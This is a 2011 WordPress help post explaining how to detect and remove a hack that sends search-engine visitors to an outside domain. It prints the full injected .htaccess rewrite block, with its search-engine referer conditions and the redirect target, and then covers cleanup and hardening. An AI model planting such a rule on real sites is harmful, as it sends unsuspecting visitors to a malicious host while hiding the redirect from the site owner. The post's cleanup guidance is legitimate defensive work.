19
Sep, 2011

wordpress securityI’ve come across several WordPress blogs that have been hacked recently. But this is an unusual hack and you may not even know that your blog has been affected. You see, this hack occurs only when people are visiting your blog when coming from a search engine. When a visitor clicks your blog link from a search engine (i.e. Google), they are redirected to http://sokoloperkovuskecl.com/in.php?g=XXX (with XXX varying from blog to blog). But if you simply type the URL of the hacked blog in the browser, the redirection does not occur. Sneaky.

How to Know You’ve Been Hacked

A simple way to find out if you’ve been hacked is to search for your blog on Google and click a link to any of your blog pages. If you have been hacked, here is how to fix it.

  1. View/edit your .htaccess file located in your root WordPress directory. If you don’t know how to find this file or don’t have access to your files, then download and install the plugin WP Htaccess Editor. Warning: You can seriously mess up your blog if you delete or add something incorrectly to your .htaccess file. Please only mess with this file if you know what you’re doing or have explicit instructions on what to do (like I have provided below).
  2. Find and delete the entire hack (shown below) which is usually located at the top of the .htaccess file:
    <IfModule mod_rewrite.c>
     RewriteEngine On
     RewriteOptions inherit
     RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
     RewriteRule .*http://sokoloperkovuskecl.com/in.php?g=56 [R,L]
     </IfModule>
  3. If you’re using the WordPress plugin, save the file. If you’re editing the file on your server, you will need to save and/or upload the file.

Why You Were Hacked

You didn’t do anything wrong; don’t worry! The problem lies with a vulnerability in timthumb.php which is a component of some WordPress themes that is used to generate thumbnails. An unpatched timthumb.php file can allow code to be executed in the timthumb cache directory or can inject code into other WordPress files. If you’re concerned about this, ask your theme developer if your theme uses timthumb.php. If it does, make sure you have the newest version.

How to Prevent Your Blog From Being Hacked Again

If you don’t protect your blog, you will be hacked again. To prevent this, download and install the plugin BulletProof Security. I will walk you through the steps to setup BulletProof Security since this plugin may appear a little overwhelming.

  1. Navigate to BPS Security in your WordPress admin.
  2. Click the Backup & Restore tab, select the radio button next to “Backup .htaccess Files” and click “Backup Files.” (This is a security measure should you need to restore from your original backup.)
  3. Click the Security Modes tab. Click Backup .htaccess Files. Then click Backup .htaccess Files.
  4. Select the radio button next to the first “BulletProof Mode” and click “Activate.” Repeat this process for the other three “BulletProof Mode” radio buttons (one at a time) and click “Activate” after each one.
  5. Click the Backup & Restore tab, click the radio button next to “Backup BPS Master .htaccess Files” and click “Backup BPS Master .htaccess Files.”

If you’d like to check the security status of your blog, click the Security Status tab. All items should be green. If they aren’t green, you should fix them. If you don’t know how, tell me and I’ll try to help you.

Happy blogging!

Tagged with →